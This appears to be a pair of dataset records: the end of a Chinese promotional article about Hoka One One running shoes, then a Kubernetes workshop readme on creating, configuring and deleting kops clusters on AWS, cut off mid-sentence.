\u53ef\u4ee5\u80cc\u5728\u5305\u91cc\uff0c\u4e0b\u5c71\u65f6\u6362\u4e0a\uff0c\u5c31\u4e0d\u5fc5\u62c5\u5fc3\u4f60\u7684\u819d\u76d6\u53d7\u635f\u4e86\u3002\u200b\n\n\u200b\n\u60f3\u8c61\u4e00\u4e0b\u8e29\u7740\u5927\u767d\u7684\u611f\u89c9\u3002\n\n\u200b\n\u8fd9\u6837\u4f18\u79c0\u7684\u8dd1\u978b\u4e0d\u51fa\u6240\u6599\u7684\u8fc5\u901f\u5360\u9886\u4e86\u5404\u5927\u8dd1\u978b\u6392\u884c\u699c\u5355\u3002\u5728\u6700\u8457\u540d\u7684\u300a\u8dd1\u8005\u4e16\u754c\u300b\u63a8\u8350\u699c\u5355\u91cc\u7ecf\u5e38\u51fa\u73b0\u5b83\u7684\u8eab\u5f71\u3002\n\n \n\u6bd4\u5982 Hoka One One Tracer \u662f\u672c\u5e74\u5ea6\u6625\u5b63\u8dd1\u978b\u63a8\u8350\u4e2d\u6700\u8f7b\u91cf\u7684\u8dd1\u978b\u4e4b\u4e00\u3002\n\nHoka One One Tracer\n \n\u300a\u8dd1\u8005\u4e16\u754c\u300b\u6bcf\u5e74\u90fd\u4f1a\u53ec\u96c6\u5168\u7f8e\u7684\u6210\u767e\u4e0a\u5343\u540d\u6d4b\u8bd5\u8005\u5bf9\u5404\u79cd\u8dd1\u978b\u8fdb\u884c\u6d4b\u8bd5\u5e76\u7ed9\u51fa\u516c\u6b63\u5ba2\u89c2\u7684\u8bc4\u5206\uff0c\u7ed3\u5408\u8bc4\u5206\u548c\u5b9e\u9645\u811a\u611f\u7ed9\u51fa\u63a8\u8350\u3002\u200b\n\n\u200b\n\u6211\u5728\u770b\u5230\u300a\u8dd1\u8005\u4e16\u754c\u300b\u5bf9 Hoka One One Conquest \u516c\u8def\u8dd1\u978b\u7684\u6d4b\u8bd5\u5206\u6570\u65f6\uff0c\u5168\u8eab\u6253\u4e86\u4e2a\u5bd2\u98a4\uff0c\u6211\u548c\u6211\u7684\u5c0f\u4f19\u4f34\u90fd\u60ca\u5446\u4e86\uff01\n\n \n\u524d\u638c\u7f13\u9707\u3001\u540e\u8ddf\u7f13\u9707\u3001\u521a\u5ea6\u8bc4\u5206\u51e0\u4e4e\u90fd\u8981\u6ee1\u5206\u7206\u8868\uff0c\u8fd9\u662f\u5728\u9020\u978b\u4e48\uff0c\u7b80\u76f4\u662f\u5728\u9020\u7b4b\u6597\u4e91\u561b\uff01\n\n \n \n \n \n\u8fd9\u8dd1\u978b\u6280\u672f\u6211\u7ed9\u6ee1\u5206\nNo.1\uff5c\u4e2d\u4f4e\u6280\u672f\n \n\u4e2d\u5e95\u7684\u6ce1\u6cab\u5bc6\u5ea6\u6bd4\u4f20\u7edf\u7684\u978b\u4f4e\u4e86 30% \u4f46\u662f\u6ce1\u6cab\u7528\u91cf\u591a\u51fa\u4e861.5\u500d\u3002\n\n \n\u9ad8\u56de\u5f39\u548c\u8db3\u5e95\u53cd\u9988\u80fd\u7ed9\u8dd1\u8005\u63d0\u4f9b\u66f4\u591a\u5f39\u529b\u3002\u6bd4\u666e\u901a\u8dd1\u978b\u591a\u4e00\u5c42\u8f6f\u57ab\uff0c\u53ef\u4ee5\u51cf\u7f13\u5927\u7ea680%\u7684\u51b2\u51fb\u529b\u3002\n\n \n \nNo.2\uff5c\u8239\u578b\u8bbe\u8ba1\n \nHoka One One \u628a\u978b\u5e95\u8bbe\u8ba1\u6210\u4e86\u8239\u5f62\uff0c\u5178\u578b\u7684\u4e24\u79cd\u978b\u5e95\u843d\u5dee\uff1a\u5206\u522b\u662f\u540e\u8ddf 35mm \u524d\u638c 31mm\uff1b\u548c\u540e\u8ddf 30mm \u524d\u638c 24mm\u3002\n\n\n\u8fd9\u79cd\u9ad8\u5ea6\u5dee\u80fd\u591f\u7ed9\u8dd1\u8005\u5e26\u6765\u7279\u522b\u6d41\u7545\u7684\u8dd1\u6b65\u611f\u53d7\uff0c\u5c31\u50cf\u8e29\u7740\u6447\u6905\u4e00\u6837\uff0c\u8dd1\u8d77\u6765\u8f7b\u677e\u7701\u529b\uff0c\u80fd\u591f\u51cf\u8f7b 20% \u7684\u819d\u76d6\u538b\u529b\u3002\n\n \n \nNo.3\uff5cRMAT \u4e2d\u5e95\n\nRMAT \u6280\u672f\u662f Hoka \u5bb6\u7684\u6700\u65b0\u7684\u6280\u672f\uff0c\u5c06\u5f39\u6027\u548c\u575a\u56fa\u6027\u76f8\u7ed3\u5408\uff0c\u540c\u65f6\u8fd8\u80fd\u914d\u5408\u5927\u5e95\u63d0\u4f9b\u4e00\u5b9a\u7684\u6293\u5730\u6027\u80fd\u3002\u6bd4\u4e00\u822c EVA \u6280\u672f\u4e2d\u5e95\u8f7b 30%\u3002\u800c\u4e14\u66f4\u8f6f\u7f13\u51b2\u66f4\u597d\u3002\n\n \n\u6709\u4e86\u8fd9\u4e2a\u4e2d\u5e95\u80fd\u591f\u8ba9\u4f60\u811a\u80fd\u66f4\u597d\u7684\u63a7\u5236\u8dd1\u978b\uff0c\u80fd\u5728\u4e0d\u540c\u5730\u5f62\u8dd1\u7684\u66f4\u5feb\uff0c\u66f4\u8f7b\u677e\uff0c\u66f4\u5b89\u5168\u3002\n\n \n \nNo.4\uff5c\u589e\u5f3a\u5916\u5e95\n\nHoka OneOne \u6bd4\u5e73\u5e38\u7684\u978b\u591a\u52a0\u4e86 50% \u7684\u5916\u5e95\uff0c\u9488\u5bf9\u5982\u6b64\u539a\u7684\u4e2d\u5e95\uff0c\u5927\u5e95\u91c7\u7528\u4e86\u5927\u91cf\u6c9f\u58d1\u51f9\u51f8\u8bbe\u8ba1\uff0c\u6765\u63d0\u9ad8\u6293\u5730\u529b\u3002\u540c\u65f6\u978b\u5e95\u7684\u4e0d\u540c\u5206\u533a\uff0c\u4fdd\u8bc1\u7075\u6d3b\u7684\u540c\u65f6\u4e0d\u727a\u7272\u7a33\u5b9a\u6027\u3002\u4e0d\u8fc7\u5373\u4fbf\u5982\u6b64\uff0c\u5916\u5730\u7684\u6297\u78e8\u635f\u6027\u80fd\u4e5f\u4e0d\u662f\u7279\u522b\u597d\uff0c\u5bb9\u6613\u6d88\u8017\u3002\n\n \n \nNo.5\uff5c\u901f\u5ea6\u978b\u57ab\n\n\u8bb8\u591a\u6b3e\u8dd1\u978b\u90fd\u63d0\u4f9b\u4e86\u4e24\u7ec4\u978b\u57ab\uff0c\u5851\u5f62\u7684\u901f\u5ea6\u978b\u57ab\u548c\u88c1\u65ad\u978b\u57ab\u3002\u901f\u5ea6\u978b\u57ab\u91c7\u75283\u5c42\u63a5\u5408\u6280\u672f\u8ba9\u978b\u57ab\u4fdd\u62a4\u811a\u66f4\u5b89\u5168\u3002\u5e76\u8ba9\u811a\u638c\u66f4\u52a0\u8d34\u5408\u4e2d\u5e95\uff0c\u4fdd\u8bc1\u6700\u4f73\u811a\u611f\u3002\n\n \n\u88c1\u65ad\u978b\u57ab\u4f7f\u7528\u4e86\u201cOrthoLite\"\u79d1\u6280\uff0c\u8f7b\u91cf\u3001\u9632\u81ed\u3002\u5728\u957f\u9014\u8fd0\u52a8\u811a\u53d8\u80bf\u80c0\u4e4b\u540e\uff0c\u53ef\u4ee5\u6362\u66f4\u8f7b\u8584\u7684\u88c1\u65ad\u978b\u57ab\uff0c\u53ef\u4ee5\u63d0\u9ad8\u66f4\u5bbd\u655e\u7684\u978b\u5185\u7a7a\u95f4\u3002\n\n \n \nNo.6\uff5c\u5feb\u901f\u978b\u5e26\n\n\u540c\u6837\uff0c\u591a\u6b3e\u8dd1\u978b\u4e5f\u914d\u5907\u4e86\u5feb\u901f\u978b\u5e26\u7cfb\u7edf\u548c\u666e\u901a\u978b\u5e26\uff0c\u4e00\u6309\u4e00\u62c9\u5c31\u53ef\u4ee5\u7cfb\u4e0a\u978b\u5e26\u3002\u65b9\u4fbf\u5728\u8fd0\u52a8\u65f6\u6362\u978b\u6216\u8005\u6362\u889c\u5b50\u3002\u5f53\u7136\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6362\u4e0a\u666e\u901a\u978b\u5e26\uff0c\u628a\u978b\u5e26\u7cfb\u7684\u66f4\u7ed3\u5b9e\u3002\n\n\n\u5e76\u4e14\u978b\u5b50\u4e0a\u6709\u52a0\u5bbd\u7684\u56fa\u5b9a\u978b\u53e3\uff0c\u63d0\u4f9b\u5305\u88f9\u6027\u4e4b\u5916\uff0c\u8fd8\u80fd\u56fa\u5b9a\u978b\u5e26\u3002\n\n \n \nNo.7\uff5c\u201c\u8d85\u7ea4\u201d\u6750\u6599\u978b\u820c\n\n\u978b\u820c\u91c7\u7528\u4e86\u201c\u8d85\u7ea4\u201d\u6750\u6599\u5236\u6210\uff0c\u8fd9\u79cd\u6750\u6599\u900f\u6c14\u67d4\u8f6f\uff0c\u5e76\u4e14\u5728\u978b\u820c\u4e0a\u7684\u900f\u6c14\u5b54\uff0c\u53ef\u4ee5\u4fdd\u8bc1\u978b\u5b50\u7684\u900f\u6c14\u6027\u3002\n\n \n \n \n\u8be5\u4e70\u54ea\u6b3eHoka One One\n\u54ea\u79cd\u978b\u5b50\u66f4\u9002\u5408\u4f60\uff1f\u4e0d\u540c\u7684\u6218\u51b5\uff0c\u91c7\u53d6\u4e0d\u540c\u7684\u5175\u5203\uff0c\u5927\u4f53\u4ee5\u5206\u8fd94\u7c7b\uff1a\n \n\u6ce8\uff1a\n1. \u70b9\u56fe\u7247\u53ef\u770b\u7f8e\u56fd\u4ef7\u683c\uff0c\u5982\u9700\u4ee3\u8d2d\u8bf7\u8054\u7cfb\u5fae\u4fe1kk794388\uff0c\u4ef7\u683c\u4ece\u4f18\n2. \u4e00\u6b3e\u978b\u5b50\u53ef\u80fd\u6709\u5f88\u591a\u79cd\u989c\u8272\/\u5c3a\u5bf8\u7ec4\u5408\uff0c\u9700\u70b9\u5165\u67e5\u770b\uff0c\u56fe\u7247\u53ea\u4f9b\u53c2\u8003\n3. \u5173\u4e8e\u7f8e\u56fd\u978b\u7801\u7684\u9009\u62e9\uff0c\u8bf7\u53c2\u8003\u6d77\u6dd8\u978b\u5b50\u5c3a\u7801\n \n \n\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\uff0c\u9762\u5411\u6240\u6709\u5730\u5f62\u548c\u4e0d\u540c\u8def\u51b5\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\u548c\u4fdd\u62a4\uff0c\u4f18\u5f02\u7684\u901a\u8fc7\u6027\uff0c\u5728\u957f\u8ddd\u79bb\u8010\u529b\u8d5b\u4e2d\uff0c\u65e0\u4e0e\u4f26\u6bd4\u7684\u8212\u9002\u6027\uff0c\u660e\u663e\u63d0\u5347\u4e86\u8dd1\u8005\u7684\u8010\u529b\u548c\u6210\u7ee9\u3002ATR\u7cfb\u8d8a\u91ce\u8dd1\u978b\uff0c\u4e00\u76f4\u53d7\u5165\u95e8\u7ea7\u8d8a\u91ce\u8dd1\u8005\u548c\u8d85\u7ea7\u8d8a\u91ce\u8d5b\u5927\u795e\u7684\u8ffd\u6367\u3002\n \n\n \n \n\u8f7b\u91cf\u5316\u8d8a\u91ce\u8dd1\u978b\uff0c\u9762\u5411\u8ffd\u6c42\u901f\u5ea6\u548c\u7ade\u6280\u7ea7\u5927\u795e\u7684\u4ea7\u7269\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\uff0c\u6bd4\u8def\u8dd1\u978b\u8fd8\u8f7b\u7684\u91cd\u91cf\uff0c\u7edd\u5bf9\u662f\u5927\u795e\u7ea7\u7684\u4e0b\u5761\u795e\u5668\u3002\u7a7f\u7740Hoka One One\u7684\u5927\u795e\u4e00\u6b21\u53c8\u4e00\u6b21\u767b\u4e0a\u5404\u5927\u8d5b\u4e8b\u7684\u9886\u5956\u53f0\u7edd\u975e\u5076\u7136\u3002\n\n \n \n \n \n\u8d8a\u91ce\u8dd1\/\u8def\u8dd1\u4e24\u7528\u8dd1\u978b\uff0c\u9762\u5411\u57ce\u5e02\u8d8a\u91ce\u8dd1\uff0c\u65e2\u6ee1\u8db3\u65e5\u5e38\u6162\u8dd1\u8bad\u7ec3\u9700\u8981\uff0c\u53c8\u80fd\u4e0a\u5c71\u5954\u8dd1\u3002\u4e0e\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\u7684\u533a\u522b\u5728\u4e8e\uff0c\u4e24\u7528\u8dd1\u978b\u7684\u978b\u5e95\u4e0d\u4ec5\u66f4\u9002\u5408\u5728\u786c\u5316\u8def\u9762\u98de\u5954\uff0c\u800c\u4e14\u5728\u786c\u5316\u8def\u9762\u4e0a\u7684\u8010\u78e8\u8868\u73b0\u66f4\u4f18\u79c0\u3002\u4e0d\u8fc7\u5728\u590d\u6742\u8d8a\u91ce\u6280\u672f\u8def\u6bb5\u4e0a\u7684\u8868\u73b0\u4f1a\u900a\u8272\u4e8e\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\u3002\n\n \n \n \n\u957f\u8ddd\u79bb\u516c\u8def\u8dd1\u978b\uff0c\u9762\u5411\u957f\u8ddd\u79bb\u7684\u9a6c\u62c9\u677e\u548c\u8def\u8dd1\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\uff0c\u8f7b\u91cf\u5316\u8bbe\u8ba1\uff0c\u65e0\u8bba\u662f\u5165\u95e8\u7ea7\u8dd1\u8005\uff0c\u8fd8\u662f\u4e89\u5206\u593a\u79d2\u7684\u9a6c\u62c9\u677e\u8fbe\u4eba\uff0c\u90fd\u4e0d\u4f1a\u62d2\u7edd\u65e2\u8f7b\u91cf\u5316\uff0c\u53c8\u4e0d\u5931\u7f13\u51b2\u548c\u56de\u5f39\u529b\u5f3a\u7684\u8dd1\u6b65\u795e\u5668\u3002\n\n \n \n \n \n \n \n \n \n \n\u53c2\u8003\uff1a\n- Wikipedia\n- Sole Man: The Story Behind Hoka Shoes\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"37b820008a1b0a39ae949ca1d9f81c35c2b838af","subject":"Inline images (3)","message":"Inline images (3)\n","repos":"arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"01-path-basics\/102-your-first-cluster\/readme.adoc","new_file":"01-path-basics\/102-your-first-cluster\/readme.adoc","new_contents":"= Create A Kubernetes Cluster Using kops\n:toc:\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n\nThis tutorial will walk you through how to install a Kubernetes cluster on AWS using kops.\n\nhttps:\/\/github.com\/kubernetes\/kops[kops], short for Kubernetes Operations, is a set of tools for installing, operating, and deleting Kubernetes clusters. kops can also perform rolling upgrades from older versions of Kubernetes to newer ones. kops also manages the cluster add-ons. After the cluster is created, the link:..\/prereqs.adoc[Kubernetes CLI] can be used to manage resources in the cluster. If you have not gone through the link:..\/prereqs.adoc[Prerequisites] section, please do so now before continuing.\n\nIf you have not set up the link:..\/101-start-here[Cloud9 Devlopment Environment] yet, please do so before continuing.\n\n== Create A Cluster with kops\n\nThe kops CLI can be used to create a highly available cluster, with multiple master nodes spread across multiple Availability Zones. Workers can be spread across multiple zones as well. Some of the tasks that happen behind the scene during cluster creation are:\n\n- Provisioning EC2 instances\n- Creating and configuring AWS resources such as a VPC, Auto Scaling Groups, IAM users, and security groups\n- Installing Kubernetes\n- If required configuring Route53 DNS\n\nWhen setting up a cluster you have two options on how the nodes in the cluster communicate:\n\n. <<create-a-gossip-based-kubernetes-cluster-with-kops, Using the gossip protocol>> - kops has support for a gossip-based cluster. This does not require a domain, subdomain, or Route53 hosted zone to be registered. A gossip-based cluster is therefore easier and quicker to setup, and is the preferred method for creating a cluster for use with this workshop.\n. <<appendix-create-a-dns-based-kubernetes-cluster, Using DNS>> - Creating a Kubernetes cluster that uses DNS for node discovery requires your own domain (or subdomain) and setting up Route 53 hosted zones. This allows the various Kubernetes components to use DNS resolutions find and communicate with each other, and for kubectl to be able to talk directly with the master node(s).\n\nInstructions for creating a gossip-based cluster are provided below, however, the examples in the workshop should work with either option. Instructions for creating a DNS-based cluster are provided as an appendix at the bottom of this page.\n\n=== Create a Gossip Based Kubernetes Cluster with kops\n\nkops supports creating a gossip-based cluster, which uses https:\/\/github.com\/weaveworks\/mesh[Weave Mesh] behind the scenes. This makes the process of creating a Kubernetes cluster using kops DNS-free, and therefore much simpler. This also means a top-level domain or a subdomain is no longer required to create the cluster. To create a cluster using the gossip protocol, indicate this to by using a cluster name with a suffix of `.k8s.local`. In the following steps, we will use example.cluster.k8s.local as a sample gossip cluster name. You may choose a different name as long as it ends with `.k8s.local`.\n\nInformation on setting up a DNS-based cluster can be found at the bottom of this page in the Appendix. However, setting up a gossip-based cluster allows you to get started quickly.\n\nWe show two examples of creating gossip-based clusters below. You can choose whether to create a single-master or multi-master cluster. Most workshop exercises will work on both types of cluster, however some modules require using a multi-master cluster (to demonstrate rolling updates, for instance.) If you aren't sure, please create a <<multi-master-multi-node-multi-az-gossip-based-cluster, multi-master cluster.>>\n\n==== Default Gossip Based Cluster\n\nBy default, `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `AWS_AVAILABILITY_ZONES` environment variable should have been set during the link:..\/101-start-here[Cloud9 Environment Setup].\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding the `--yes` flag ensures that the cluster is immediately created as well.\n\nAlternatively, you may not specify the `--yes` flag as part of the `kops create cluster` command. Then you can use `kops edit cluster example.cluster.k8s.local` command to view the current cluster state and make changes. The cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.k8s.local --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up Auto Scaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. This process can take some time based upon the number of master and worker nodes.\n\nNote: If your 'create cluster' fails with an error like:\n```\nerror reading s3:\/\/example-kops-state-store-workshop\/workshop-prep.cluster.k8s.local\/config: Unable to list AWS regions: NoCredentialProviders: no valid providers in chain\ncaused by: EnvAccessKeyNotFound: failed to find credentials in the environment.\"\n```\n, try setting the following environment variables before executing the 'create cluster' command:\n```\nexport AWS_DEFAULT_PROFILE=<your_aws_credentials_profile_name>\nexport AWS_SDK_LOAD_CONFIG=1\n```\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-57-94.ec2.internal master True\nip-172-20-63-55.ec2.internal node True\nip-172-20-75-78.ec2.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n==== Multi-master, multi-node, multi-az Gossip Based Cluster\n\nCreate a cluster with multi-master, multi-node and multi-az configuration. We can create and build the cluster in one step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\nThe `--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nIt will take 5-8 minutes for the cluster to be created. Validate the cluster:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-101-97.ec2.internal node True\nip-172-20-119-53.ec2.internal node True\nip-172-20-124-138.ec2.internal master True\nip-172-20-35-15.ec2.internal master True\nip-172-20-63-104.ec2.internal node True\nip-172-20-69-241.ec2.internal node True\nip-172-20-84-65.ec2.internal node True\nip-172-20-93-167.ec2.internal master True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ slightly from the one shown here based up on the type of cluster you created.\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] \nYou are now ready to continue on with the workshop!\nThe next step is link:..\/103-kubernetes-concepts[to learn about basic Kubernetes Concepts].\n\n\n=== (Optional) Create a Kubernetes cluster in a private VPC\n\nkops can create a private Kubernetes cluster, where the master and worker nodes are launched in private subnets in a VPC. This is possible with both Gossip and DNS-based clusters. This reduces the attack surface on your instances by protecting them behind security groups inside private subnets. The services hosted in the cluster can still be exposed via internet-facing ELBs if required. It's necessary to run a CNI network provider in the Kubernetes cluster when using a private topology. We have used https:\/\/www.projectcalico.org\/[Calico] below, though other options such as `kopeio-vxlan`, `weave`, `romano` and others are available.\n\nTo print full list of CNI providers:\n\n kops create cluster --help\n\nCreate a gossip-based private cluster with master and worker nodes in private subnets:\n\n $ kops create cluster \\\n --networking calico \\\n --topology private \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up AutoScaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. This process can take some time based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-124-144.eu-central-1.compute.internal node True\nip-172-20-58-179.eu-central-1.compute.internal master True\nip-172-20-93-220.eu-central-1.compute.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nIt is also possible to create a DNS-based cluster where the master and worker nodes are in private subnets. For more information about creating DNS-based clusters, see Appendix: Create a DNS-based Kubernetes cluster below.\nIf `--dns private` is also specified, a Route53 private hosted zone is created for routing the traffic for the domain within one or more VPCs. The Kubernetes API can therefore only be accessed from within the VPC. This is a current issue with kops (see https:\/\/github.com\/kubernetes\/kops\/issues\/2032). A possible workaround is to mirror the private Route53 hosted zone with a public hosted zone that exposes only the API server ELB endpoint. This workaround is discussed http:\/\/kubecloud.io\/setup-ha-k8s-kops\/[here].\n\nAlthough most of the exercises in this workshop should work on a cluster with a private VPC, some commands won't, specifically those that use a proxy to access internally hosted services.\n\n== Kubernetes Cluster Context\n\nYou may create multiple Kubernetes clusters. The configuration for each cluster is stored in a configuration file, referred to as \"`kubeconfig file`\". By default, kubectl looks for a file named `config` in the directory `~\/.kube`. The kubectl CLI uses kubeconfig file to find the information it needs to choose a cluster and communicate with the API server of a cluster.\n\nThis allows you to deploy your applications to different environments by just changing the context. For example, here is a typical flow for application development:\n\n. Build your application using minikube (See Set up Local Development Environment for more information)\n. Change the context to a test cluster created on AWS\n. Use the same command to deploy to test environment\n. Once satisfied, change the context again to a production cluster on AWS\n. Once again, use the same command to deploy to production environment\n\nGet a summary of available contexts:\n\n $ kubectl config get-contexts\n kubectl config get-contexts\n CURRENT NAME CLUSTER AUTHINFO NAMESPACE\n * example.cluster.k8s.local example.cluster.k8s.local example.cluster.k8s.local\n minikube minikube minikube\n\nThe output shows dfferent contexts, one per cluster, that are available to kubectl. `NAME` column shows the context name. `*` indicates the current context.\n\nView the current context:\n\n $ kubectl config current-context\n example.cluster.k8s.local\n\nIf multiple clusters exist, then you can change the context:\n\n $ kubectl config use-context <config-name>\n\n== Turn on an API version for your Cluster\n\nNote: This section is for Kubebernetes 1.7.x, in 1.8.x the api is `batch\/v1beta1`. \n\nKubernetes resources are created with a specific API version. The exact value is defined by the `apiVersion` attribute in the resource configuration file. Some of the values are `v1`, `extensions\/v1beta1` or `batch\/v1`. By default, resources with `apiVersion` values X, Y, Z are enabled. If a resource has a version with the word `alpha` in it, then that version needs to be explicitly enabled in the cluster. For example, if you are running a Kubernetes cluster of version 1.7.x, then Cron Job resource cannot be created unless `batch\/v2alpha1` is explicitly enabled.\n\nThis section shows how to turn on an API version for your cluster. It will use `batch\/v2alpha1` as an example.\n\nSpecific API versions can be turned on or off by passing `--runtime-config=api\/<version>` flag while bringing up the API server. To turn on our specific version, we'll need to pass `--runtime-config=batch\/v2alpha1=true`.\n\nFor a cluster created using kops, this can be done by editing the cluster configuration using the command shown:\n\n $ kops edit cluster --name example.cluster.k8s.local\n\nThis will open up the cluster configuration in a text editor. Update the `spec` attribute such that it looks like as shown:\n\n spec:\n kubeAPIServer:\n runtimeConfig:\n batch\/v2alpha1: \"true\"\n api:\n\nSave the changes and exit the editor. Kubernetes cluster needs to re-read the configuration. This can be done by forcing a rolling update of the cluster using the following command:\n\nNOTE: This process can easily take 30-45 minutes. Its recommended to leave the cluster without any updates during that time.\n\n $ kops rolling-update cluster --yes\n Using cluster from kubectl context: example.cluster.k8s.local\n\n NAME STATUS NEEDUPDATE READY MIN MAX NODES\n master-eu-central-1a Ready 0 1 1 1 1\n nodes Ready 0 2 2 2 2\n I1025 20:50:51.158013 354 instancegroups.go:350] Stopping instance \"i-0ba714556f0f892cc\", node \"ip-172-20-58-179.eu-central-1.compute.internal\", in AWS ASG \"master-eu-central-1a.masters.example.cluster.k8s.local\".\n I1025 20:55:51.413506 354 instancegroups.go:350] Stopping instance \"i-0265a07c3320b266b\", node \"ip-172-20-93-220.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:57:52.448582 354 instancegroups.go:350] Stopping instance \"i-09e2efd9f5e9ebfce\", node \"ip-172-20-124-144.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:59:53.325980 354 rollingupdate.go:174] Rolling update completed!\n\nThis command will first stop one master node in the cluster, re-read the configuration information and start that master. Then it will do the same for rest of the master nodes. And then it will repeat that for each worker node in the cluster. After all the server and worker nodes have been restarted, the rolling update of the cluster is complete.\n\nLet's verify that the attributes are now successfully passed to the API server. Get the list of pods for the API server using the command shown:\n\n $ kubectl get pods --all-namespaces | grep kube-apiserver\n kube-system kube-apiserver-ip-172-20-117-32.ec2.internal 1\/1 Running 0 7m\n kube-system kube-apiserver-ip-172-20-62-108.ec2.internal 1\/1 Running 6 16m\n kube-system kube-apiserver-ip-172-20-79-64.ec2.internal 1\/1 Running 2 12m\n\nThe output shows three pods, one each for API server, corresponding to the three master nodes. This output is from a cluster with three master nodes. The output may be different if your cluster was created with different number of masters.\n\nSearch for the `--runtime-config` option as shown:\n\n $ kubectl describe --namespace=kube-system pod <pod-name> | grep runtime\n\n`<pod-name>` is name of one of the pods shown above.\n\nA formatted output is shown below:\n\n \/usr\/local\/bin\/kube-apiserver \\\n --address=127.0.0.1 \\\n --admission-control=NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,DefaultTolerationSeconds,ResourceQuota \\\n --allow-privileged=true \\\n --anonymous-auth=false \\\n --apiserver-count=3 \\\n --authorization-mode=AlwaysAllow \\\n --basic-auth-file=\/srv\/kubernetes\/basic_auth.csv \\\n --client-ca-file=\/srv\/kubernetes\/ca.crt \\\n --cloud-provider=aws \\\n --etcd-servers-overrides=\/events#http:\/\/127.0.0.1:4002 \\\n --etcd-servers=http:\/\/127.0.0.1:4001 --insecure-port=8080 --kubelet-preferred-address-types=InternalIP,Hostname,ExternalIP \\\n --runtime-config=batch\/v2alpha1=true \\\n --secure-port=443 \\\n --service-cluster-ip-range=100.64.0.0\/13 \\\n --storage-backend=etcd2 \\\n --tls-cert-file=\/srv\/kubernetes\/server.cert \\\n --tls-private-key-file=\/srv\/kubernetes\/server.key \\\n --token-auth-file=\/srv\/kubernetes\/known_tokens.csv \\\n --v=2 \\\n 1>>\/var\/log\/kube-apiserver.log 2>&1\n\nThe output clearly shows that `--runtime-config=batch\/v2alpha1=true` is passed as an option to the API server. This means the cluster is now ready for creating creating APIs with version `batch\/v2alpha1`.\n\n== Instance Groups with kops\n\nAn instance group, or ig for short, is a kops concept that defines a grouping of similar nodes. In AWS, an instance group maps to an Auto Scaling Group (ASG). Instructions on how to create instance groups can be found link:instance-groups\/readme.adoc[here].\n\n== Delete A Cluster\n\nAny cluster can be deleted as shown:\n\n $ kops delete cluster \\\n <cluster-name> \\\n --yes\n\n`<cluster-name>` is the name of the cluster. For example, our `example.cluster.k8s.local` cluster can be deleted as:\n\n $ kops delete cluster \\\n example.cluster.k8s.local \\\n --yes\n\nIf you leave off the `--yes` flag, you will get a listing of all the resources kops will delete. To confirm deletion, run the command again appending `--yes`.\n\nIf you created a private VPC, then an additional cleanup of 